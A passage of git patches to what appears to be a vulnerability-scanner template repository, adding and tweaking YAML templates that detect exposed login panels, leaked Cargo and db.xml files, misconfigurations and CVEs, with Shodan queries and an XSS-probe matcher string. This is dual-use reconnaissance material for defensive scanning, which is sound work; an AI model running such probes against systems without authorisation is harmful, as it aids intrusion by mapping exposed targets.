 create mode 100644 exposed-panels/code-server-login-panel.yaml

diff --git a/exposed-panels/code-server-login-panel.yaml b/exposed-panels/code-server-login-panel.yaml
new file mode 100644
index 0000000000..3336086f7c
--- /dev/null
+++ b/exposed-panels/code-server-login-panel.yaml
@@ -0,0 +1,30 @@
+id: code-server-login-panel
+
+info:
+  name: Code Server Login
+  author: tess
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: html:"config.yaml"
+  tags: tech,detect,misc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Welcome to code-server"
+          - "Please log in below. Check the config file at ~/.config/code-server/config.yaml for the password."
+        condition: and
+
+      - type: status
+        status:
+          - 200

From bc40cf9c12b28f2af4741f977f4286a97300a55b Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sun, 23 Oct 2022 15:15:28 +0700
Subject: [PATCH 23/93] fix: false negative rundeck

- Fix false negative rundeck by changing the matcher
- Added version detection for old rundeck and new rundeck
---
 exposed-panels/rundeck-login.yaml | 24 +++++++++++++++++-------
 1 file changed, 17 insertions(+), 7 deletions(-)

diff --git a/exposed-panels/rundeck-login.yaml b/exposed-panels/rundeck-login.yaml
index b3ddda4290..ffba8fda77 100644
--- a/exposed-panels/rundeck-login.yaml
+++ b/exposed-panels/rundeck-login.yaml
@@ -1,8 +1,8 @@
 id: rundeck-login
 
 info:
-  name: RunDeck Login
-  author: DhiyaneshDk
+  name: RunDeck Login Panel
+  author: DhiyaneshDk, daffainfo
   severity: info
   metadata:
     verified: true
@@ -16,14 +16,24 @@ requests:
 
     host-redirects: true
     max-redirects: 2
-    matchers-condition: or
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - 'Rundeck - Login</title>'
+          - 'utm_source=rundeckapp'
+          - 'name="j_username" id="login"'
+          - 'name="j_password" id="password"'
+        condition: and
 
-      - type: word
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
         part: body
-        words:
-          - 'RUNDECK ENTERPRISE - Login</title>'
+        group: 1
+        regex:
+          - '<a href=\"https:\/\/docs.rundeck.com\/([0-9.]+)'
+          - '<a href=\"http:\/\/rundeck\.org\/([0-9.]+)' ## Detection version on old rundeck

From 9a51c2478d22cb143185b1ca497b3c0d608efdf3 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 20:48:08 +0530
Subject: [PATCH 24/93] Update xeams-admin.yaml

---
 exposed-panels/xeams-admin.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/exposed-panels/xeams-admin.yaml b/exposed-panels/xeams-admin.yaml
index 182e346c3f..e0e275fadf 100644
--- a/exposed-panels/xeams-admin.yaml
+++ b/exposed-panels/xeams-admin.yaml
@@ -23,8 +23,8 @@ requests:
         words:
           - '<title>Xeams Admin Console'
           - 'eXtended Email And Messaging Server</span>'
-        condition: and
+        condition: or
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200

From 1772f7a95ed0abbc70dbed90acc057148fed0be1 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 21:02:18 +0530
Subject: [PATCH 25/93] Update rundeck-login.yaml

---
 exposed-panels/rundeck-login.yaml | 11 ++++-------
 1 file changed, 4 insertions(+), 7 deletions(-)

diff --git a/exposed-panels/rundeck-login.yaml b/exposed-panels/rundeck-login.yaml
index ffba8fda77..f0590b8527 100644
--- a/exposed-panels/rundeck-login.yaml
+++ b/exposed-panels/rundeck-login.yaml
@@ -2,7 +2,7 @@ id: rundeck-login
 
 info:
   name: RunDeck Login Panel
-  author: DhiyaneshDk, daffainfo
+  author: DhiyaneshDk,daffainfo
   severity: info
   metadata:
     verified: true
@@ -14,17 +14,14 @@ requests:
     path:
       - '{{BaseURL}}/user/login'
 
-    host-redirects: true
-    max-redirects: 2
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - 'utm_source=rundeckapp'
-          - 'name="j_username" id="login"'
-          - 'name="j_password" id="password"'
-        condition: and
+          - 'Rundeck - Login</title>'
+          - 'alt="Rundeck'
+        condition: or
 
       - type: status
         status:

From 4204fcb64650787c96912c9e08a1990703690ee4 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 21:33:50 +0530
Subject: [PATCH 26/93] Create openvpn-router-management.yaml

---
 exposed-panels/openvpn-router-management.yaml | 26 +++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 exposed-panels/openvpn-router-management.yaml

diff --git a/exposed-panels/openvpn-router-management.yaml b/exposed-panels/openvpn-router-management.yaml
new file mode 100644
index 0000000000..290e5c0e35
--- /dev/null
+++ b/exposed-panels/openvpn-router-management.yaml
@@ -0,0 +1,26 @@
+id: openvpn-router-management
+
+info:
+  name:  OpenVPN Server Router Management
+  author: ritikchaddha
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: http.html:"Router Management - Server OpenVPN"
+  tags: panel,openvpn,router,management
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Router Management - Server OpenVPN"
+
+      - type: status
+        status:
+          - 200

From bd463e438f1bb9441917824bc3114f852f1cbf54 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 21:36:20 +0530
Subject: [PATCH 27/93] Update openvpn-router-management.yaml

---
 exposed-panels/openvpn-router-management.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposed-panels/openvpn-router-management.yaml b/exposed-panels/openvpn-router-management.yaml
index 290e5c0e35..3537d4f547 100644
--- a/exposed-panels/openvpn-router-management.yaml
+++ b/exposed-panels/openvpn-router-management.yaml
@@ -1,7 +1,7 @@
 id: openvpn-router-management
 
 info:
-  name:  OpenVPN Server Router Management
+  name: OpenVPN Server Router Management
   author: ritikchaddha
   severity: low
   metadata:

From 4b4966ed2094a0d281cd8facd16fec6eba1f9b9e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 24 Oct 2022 00:26:45 +0530
Subject: [PATCH 28/93] Create cadvisor-exposure.yaml

---
 misconfiguration/cadvisor-exposure.yaml | 31 +++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 misconfiguration/cadvisor-exposure.yaml

diff --git a/misconfiguration/cadvisor-exposure.yaml b/misconfiguration/cadvisor-exposure.yaml
new file mode 100644
index 0000000000..3192e57d88
--- /dev/null
+++ b/misconfiguration/cadvisor-exposure.yaml
@@ -0,0 +1,31 @@
+id: cadvisor-exposure
+
+info:
+  name: cAdvisor Exposure
+  author: DhiyaneshDk
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: title:"cAdvisor"
+  tags: exposure,misconfig,dashboard
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/containers/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>cAdvisor - /</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From 4e4a8d68f292f2dbf11eef0165a6b56cf039ed88 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 24 Oct 2022 00:37:41 +0530
Subject: [PATCH 29/93] Create superset-login.yaml

---
 exposed-panels/superset-login.yaml | 31 ++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 exposed-panels/superset-login.yaml

diff --git a/exposed-panels/superset-login.yaml b/exposed-panels/superset-login.yaml
new file mode 100644
index 0000000000..6d4f2b2e25
--- /dev/null
+++ b/exposed-panels/superset-login.yaml
@@ -0,0 +1,31 @@
+id: superset-login
+
+info:
+  name: Superset Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Superset"
+  tags: panel,superset
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login/#'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Superset</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From 8e641ec69dd61047b77cf77ad5a5ca2d90343129 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 24 Oct 2022 00:49:16 +0530
Subject: [PATCH 30/93] Create cargo-lock-package.yaml

---
 exposures/files/cargo-lock-package.yaml | 30 +++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 exposures/files/cargo-lock-package.yaml

diff --git a/exposures/files/cargo-lock-package.yaml b/exposures/files/cargo-lock-package.yaml
new file mode 100644
index 0000000000..b7254b3b91
--- /dev/null
+++ b/exposures/files/cargo-lock-package.yaml
@@ -0,0 +1,30 @@
+id: cargo-lock-package
+
+info:
+  name: Cargo Lock Packages Disclosure
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt
+  metadata:
+    verified: true
+    shodan-query: html:"Cargo.lock"
+  tags: exposure,files,cargo
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Cargo.lock'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "[[package]]"
+          - "dependencies = ["
+        condition: and
+
+      - type: status
+        status:
+          - 200

From c1548b36ab5f951f43f5af88b7dad42fe5323cda Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 24 Oct 2022 00:55:27 +0530
Subject: [PATCH 31/93] Create cargo-toml-file.yaml

---
 exposures/files/cargo-toml-file.yaml | 30 ++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 exposures/files/cargo-toml-file.yaml

diff --git a/exposures/files/cargo-toml-file.yaml b/exposures/files/cargo-toml-file.yaml
new file mode 100644
index 0000000000..86e4688ac8
--- /dev/null
+++ b/exposures/files/cargo-toml-file.yaml
@@ -0,0 +1,30 @@
+id: cargo-toml-file
+
+info:
+  name: Cargo TOML File Disclosure
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://doc.rust-lang.org/cargo/reference/manifest.html
+  metadata:
+    verified: true
+    shodan-query: html:"Cargo.toml"
+  tags: exposure,files,cargo
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Cargo.toml'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "[package]"
+          - "[dependencies]"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 9afd118d13146002d417a7d9a1b1e73f24154ad7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 24 Oct 2022 01:43:07 +0530
Subject: [PATCH 32/93] Create express-default-page.yaml

---
 technologies/express-default-page.yaml | 33 ++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 technologies/express-default-page.yaml

diff --git a/technologies/express-default-page.yaml b/technologies/express-default-page.yaml
new file mode 100644
index 0000000000..c46b89441d
--- /dev/null
+++ b/technologies/express-default-page.yaml
@@ -0,0 +1,33 @@
+id: express-default-page
+
+info:
+  name: Express Default Page
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"Welcome to Express"
+  tags: tech,express
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Express</title>"
+          - "Welcome to Express"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

From f6feba059cf82ed2a6e7dcb074abdd05d2307fc7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 24 Oct 2022 01:47:47 +0530
Subject: [PATCH 33/93] Create express-stack-trace.yaml

---
 misconfiguration/express-stack-trace.yaml | 33 +++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 misconfiguration/express-stack-trace.yaml

diff --git a/misconfiguration/express-stack-trace.yaml b/misconfiguration/express-stack-trace.yaml
new file mode 100644
index 0000000000..d1a6e25549
--- /dev/null
+++ b/misconfiguration/express-stack-trace.yaml
@@ -0,0 +1,33 @@
+id: express-stack-trace
+
+info:
+  name: Express Stack Trace
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"Welcome to Express"
+  tags: misconfig,express
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/{{randstr}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "NotFoundError: Not Found"
+          - "at Function.handle"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 404

From 6c0e7bd72095b17c5b3fbc6b0881070ae3aecb83 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Mon, 24 Oct 2022 03:18:01 +0530
Subject: [PATCH 34/93] VMware Authentication Daemon Detection

---
 .../vmware-authentication-daemon-detect.yaml  | 30 +++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 network/detection/vmware-authentication-daemon-detect.yaml

diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml
new file mode 100644
index 0000000000..9b89b5b67f
--- /dev/null
+++ b/network/detection/vmware-authentication-daemon-detect.yaml
@@ -0,0 +1,30 @@
+id: vmware-authentication-daemon-detect
+
+info:
+  name: VMware Authentication Daemon Detection
+  author: pussycat0x
+  severity: info
+  description: |
+    vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation.
+  metadata:
+    verified: true
+    shodan-query: 'product:"VMware Authentication Daemon"'
+  tags: network,vmware,auth
+
+network:
+
+  - inputs:
+      - data: "\n"
+    host:
+      - "{{Hostname}}"
+      - "{{Host}}:902"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "ServerDaemonProtocol:SOAP"
+          - "MKSDisplayProtocol:VNC"
+    extractors:
+      - type: regex
+        regex:
+          - "VMware Authentication Daemon Version ([0-9.]+)"
\ No newline at end of file

From 18770241ecbfe9c9807a4fa664d803efe0578678 Mon Sep 17 00:00:00 2001
From: Arman <65326024+tess-ss@users.noreply.github.com>
Date: Sun, 23 Oct 2022 23:58:29 -0400
Subject: [PATCH 35/93] Create db-xml-file-exposed.yaml

---
 misconfiguration/db-xml-file-exposed.yaml | 30 +++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 misconfiguration/db-xml-file-exposed.yaml

diff --git a/misconfiguration/db-xml-file-exposed.yaml b/misconfiguration/db-xml-file-exposed.yaml
new file mode 100644
index 0000000000..57592e8fe3
--- /dev/null
+++ b/misconfiguration/db-xml-file-exposed.yaml
@@ -0,0 +1,30 @@
+id: db-xml-file-exposed
+
+info:
+  name: db.xml file exposed
+  author: tess
+  severity: medium
+  metadata:
+    verified: true
+  tags: db,exposure,misconfig
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/db.xml"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "ServerName"
+          - "DBPASS"
+          - "DBtype"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 9922e94a7faa51e191fcbd3f9407d4a2f0f716eb Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 24 Oct 2022 18:26:43 +0530
Subject: [PATCH 36/93] Update api-nytimes.yaml

---
 token-spray/api-nytimes.yaml | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/token-spray/api-nytimes.yaml b/token-spray/api-nytimes.yaml
index 81ee271479..5743e5817b 100644
--- a/token-spray/api-nytimes.yaml
+++ b/token-spray/api-nytimes.yaml
@@ -20,8 +20,7 @@ requests:
       - type: word
         part: body
         words:
-          - 'status'
-          - 'copyright'
-          - 'num_results'
-          - 'results'
+          - '"status":'
+          - '"copyright":'
+          - '"num_results":'
         condition: and

From 8e163d2fe0026ca8d0aae20e2295157754eaa5c7 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 24 Oct 2022 18:29:06 +0530
Subject: [PATCH 37/93] Update temenos-t24-login.yaml

---
 exposed-panels/temenos-t24-login.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/exposed-panels/temenos-t24-login.yaml b/exposed-panels/temenos-t24-login.yaml
index c8f4ef6a83..3f7652c325 100644
--- a/exposed-panels/temenos-t24-login.yaml
+++ b/exposed-panels/temenos-t24-login.yaml
@@ -1,7 +1,7 @@
-id: temenos-t24-login-panel
+id: temenos-t24-login
 
 info:
-  name: Temenos T24/Transact Login Page
+  name: Temenos T24/Transact Login Pagel
   author: korteke
   severity: info
   description: Exposed Temenos T24 login panel

From 8cc32c39883cc8fdb81193f8aedd55fa62025fd2 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 24 Oct 2022 12:59:59 +0000
Subject: [PATCH 38/93] Auto Generated New Template Addition List [Mon Oct 24
 12:59:59 UTC 2022] :robot:

---
 .new-additions | 41 +----------------------------------------
 1 file changed, 1 insertion(+), 40 deletions(-)

diff --git a/.new-additions b/.new-additions
index 6821ad3981..3d94539fc1 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,40 +1 @@
-cves/2021/CVE-2021-33851.yaml
-cves/2022/CVE-2022-0885.yaml
-cves/2022/CVE-2022-1574.yaml
-cves/2022/CVE-2022-28290.yaml
-cves/2022/CVE-2022-33901.yaml
-cves/2022/CVE-2022-41473.yaml
-default-logins/dataiku/dataiku-default-login.yaml
-exposed-panels/bmc/bmc-discovery-panel.yaml
-exposed-panels/dataiku-panel.yaml
-exposed-panels/hypertest-dashboard.yaml
-exposed-panels/novnc-login-panel.yaml
-exposed-panels/opengear-panel.yaml
-exposed-panels/piwigo-panel.yaml
-exposed-panels/processwire-login.yaml
-exposed-panels/qlik-sense-server.yaml
-exposed-panels/retool-login.yaml
-exposed-panels/sonic-wall-application.yaml
-exposed-panels/totemomail-panel.yaml
-exposures/configs/cakephp-config.yaml
-exposures/files/go-mod-disclosure.yaml
-exposures/files/travis-ci-disclosure.yaml
-exposures/tokens/loqate/loqate-api-key.yaml
-misconfiguration/iot-vdme-simulator.yaml
-misconfiguration/springboot/springboot-auditevents.yaml
-misconfiguration/springboot/springboot-features.yaml
-misconfiguration/springboot/springboot-jolokia.yaml
-misconfiguration/springboot/springboot-logfile.yaml
-misconfiguration/springboot/springboot-loggerconfig.yaml
-misconfiguration/springboot/springboot-status.yaml
-network/detection/gnu-inetutils-ftpd-detect.yaml
-network/detection/mikrotik-ftp-server-detect.yaml
-network/detection/proftpd-server-detect.yaml
-network/detection/xlight-ftp-service-detect.yaml
-ssl/weak-cipher-suites.yaml
-takeovers/surveysparrow-takeover.yaml
-technologies/joomla-detect.yaml
-technologies/open-journal-systems.yaml
-technologies/oracle/oracle-atg-commerce.yaml
-vulnerabilities/other/aerocms-sqli.yaml
-vulnerabilities/other/xenmobile-server-log4j.yaml
+token-spray/api-nytimes.yaml

From d93d71a9c28cf8bc1a4dcf5008c3d9b67e28bbfa Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 24 Oct 2022 18:31:23 +0530
Subject: [PATCH 39/93] Update CVE-2022-41840.yaml

---
 cves/2022/CVE-2022-41840.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml
index 547e74894b..a41cd1af55 100644
--- a/cves/2022/CVE-2022-41840.yaml
+++ b/cves/2022/CVE-2022-41840.yaml
@@ -11,8 +11,8 @@ info:
   classification:
     cve-id: CVE-2022-41840
   metadata:
-    verified: "true"
-  tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth
+    verified: true
+  tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
 
 requests:
   - method: GET

From 80296a2f0e287d2fce0508a1013bc5793bcabc4b Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 24 Oct 2022 13:01:45 +0000
Subject: [PATCH 40/93] Auto Generated New Template Addition List [Mon Oct 24
 13:01:45 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 3d94539fc1..3fb67c0136 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1 +1,2 @@
+exposed-panels/temenos-t24-login.yaml
 token-spray/api-nytimes.yaml

From 0991ae19f419ae228449744e44ccbea43027ccc3 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 24 Oct 2022 18:33:38 +0530
Subject: [PATCH 41/93] Update CVE-2022-0928.yaml

---
 cves/2022/CVE-2022-0928.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml
index 5247e9ddfd..9d8b37f2fa 100644
--- a/cves/2022/CVE-2022-0928.yaml
+++ b/cves/2022/CVE-2022-0928.yaml
@@ -17,7 +17,7 @@ info:
     cwe-id: CWE-79
   metadata:
     verified: true
-  tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
+  tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
 
 requests:
   - raw:

From 2728431644beced327a07bd208596c2e2e76c056 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 24 Oct 2022 18:35:24 +0530
Subject: [PATCH 42/93] Update CVE-2022-1007.yaml

---
 cves/2022/CVE-2022-1007.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves/2022/CVE-2022-1007.yaml b/cves/2022/CVE-2022-1007.yaml
index 2a3d7319f9..4f9f537792 100644
--- a/cves/2022/CVE-2022-1007.yaml
+++ b/cves/2022/CVE-2022-1007.yaml
@@ -34,8 +34,8 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - "contains(all_headers_2, 'text/html')"
-          - "status_code_2 == 200"
           - "contains(body_2, '<script>alert(document.domain)</script>')"
           - "contains(body_2, 'advanced-booking-calendar')"
+          - "contains(all_headers_2, 'text/html')"
+          - "status_code_2 == 200"
         condition: and

From 91e8fb83eb348c4a73f7b8e81aaa387586cffa4f Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 24 Oct 2022 13:06:55 +0000
Subject: [PATCH 44/93] Auto Generated New Template Addition List [Mon Oct 24
 13:06:55 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 3fb67c0136..e62312f28b 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,2 +1,3 @@
+cves/2022/CVE-2022-41840.yaml
 exposed-panels/temenos-t24-login.yaml
 token-spray/api-nytimes.yaml

From 5132ff636e150214cd5af7258cbfd1541881ec4b Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 24 Oct 2022 13:07:27 +0000
Subject: [PATCH 45/93] Auto Generated New Template Addition List [Mon Oct 24
 13:07:27 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index e62312f28b..69d012aea9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+cves/2022/CVE-2022-1007.yaml
 cves/2022/CVE-2022-41840.yaml
 exposed-panels/temenos-t24-login.yaml
 token-spray/api-nytimes.yaml

From a88d4fc26603f3fd01fda5e6b20e671df629ac1d Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 24 Oct 2022 18:48:01 +0530
Subject: [PATCH 46/93] Update wordpress-detect.yaml

---
 technologies/wordpress-detect.yaml | 23 ++++++++++++++++++-----
 1 file changed, 18 insertions(+), 5 deletions(-)

diff --git a/technologies/wordpress-detect.yaml b/technologies/wordpress-detect.yaml
index ef137b53b8..d1cb4d82db 100644
--- a/technologies/wordpress-detect.yaml
+++ b/technologies/wordpress-detect.yaml
@@ -12,23 +12,36 @@ info:
 requests:
   - method: GET
     path:
+      - '{{BaseURL}}'
       - '{{BaseURL}}/feed/'
       - '{{BaseURL}}/?feed=rss2' #alternative if /feed/ is blocked
 
     stop-at-first-match: true
-    matchers-condition: and
+    matchers-condition: or
     matchers:
       - type: regex
-        part: body
         regex:
+          - '<link[^>]+s\d+\.wp\.com'
+          - '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -'
+          - '<!--[^>]+WP-Super-Cache'
+        condition: or
+
+      - type: word
+        part: body
+        words:
           - '<generator>'
           - '<link>'
           - '<title>'
         condition: and
 
-      - type: status
-        status:
-          - 200
+      - type: word
+        words:
+          - 'wp-login.php'
+          - '/wp-content/themes/'
+          - '/wp-includes/'
+          - 'name="generator" content="wordpress'
+          - '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/'
+        condition: or
 
     extractors:
       - type: regex

From 5de3b0ce1931eb2b9ceb5415657a0bc3966c62e1 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 24 Oct 2022 13:22:12 +0000
Subject: [PATCH 47/93] Auto Generated CVE annotations [Mon Oct 24 13:22:12 UTC
 2022] :robot:

---
 cves/2022/CVE-2022-1007.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/cves/2022/CVE-2022-1007.yaml b/cves/2022/CVE-2022-1007.yaml
index 4f9f537792..5444480328 100644
--- a/cves/2022/CVE-2022-1007.yaml
+++ b/cves/2022/CVE-2022-1007.yaml
@@ -11,10 +11,13 @@ info:
     - https://wordpress.org/plugins/advanced-booking-calendar/
     - https://nvd.nist.gov/vuln/detail/cve-2022-1007
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2022-1007
+    cwe-id: CWE-79
   metadata:
-    verified: true
-  tags: cve,cve2022,wordpress,wp-plugin,xss,wp,advanced-booking-calendar,authenticated
+    verified: "true"
+  tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss
 
 requests:
   - raw:

From 94995813b38bc6fc0f3f12a86ca7cc1046fb1661 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 24 Oct 2022 20:12:57 +0530
Subject: [PATCH 48/93] Update http-missing-security-headers.yaml

---
 misconfiguration/http-missing-security-headers.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml
index 49d11d7496..cd3bed8744 100644
--- a/misconfiguration/http-missing-security-headers.yaml
+++ b/misconfiguration/http-missing-security-headers.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   description: |
     This template searches for missing HTTP security headers. The impact of these missing headers can vary.
-  tags: misconfig,generic
+  tags: misconfig,headers,generic
 
 requests:
   - method: GET

From 1920b0bc38c77a7f0daf9856165ee30badc6462f Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 11:39:19 +0530
Subject: [PATCH 50/93] Update wordpress-detect.yaml

---
 technologies/wordpress-detect.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/technologies/wordpress-detect.yaml b/technologies/wordpress-detect.yaml
index d1cb4d82db..ef69cb594a 100644
--- a/technologies/wordpress-detect.yaml
+++ b/technologies/wordpress-detect.yaml
@@ -1,13 +1,13 @@
 id: wordpress-detect
 
 info:
-  name: WordPress Detection
+  name: WordPress Detect
   author: pdteam,daffainfo
   severity: info
   metadata:
     verified: true
     shodan-query: http.component:"WordPress"
-  tags: tech,wordpress
+  tags: tech,wordpress,cms,wp
 
 requests:
   - method: GET

From b85588e3e5a71309cfd7298f3d0072f2cd86029c Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 11:48:43 +0530
Subject: [PATCH 53/93] Update openvpn-connect.yaml

---
 exposed-panels/openvpn-connect.yaml | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/exposed-panels/openvpn-connect.yaml b/exposed-panels/openvpn-connect.yaml
index aecbab9012..1a21b06c98 100644
--- a/exposed-panels/openvpn-connect.yaml
+++ b/exposed-panels/openvpn-connect.yaml
@@ -7,14 +7,13 @@ info:
   metadata:
     verified: true
     shodan-query: http.title:"openvpn connect"
-  tags: openvpn,connect,panel
+  tags: panel,openvpn,connect,vpn
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/?src=connect'
 
-    cookie-reuse: true
     host-redirects: true
     max-redirects: 2
     matchers:

From a8ae75597bf4a5f7d3ede5c8d21ab435ae139e93 Mon Sep 17 00:00:00 2001
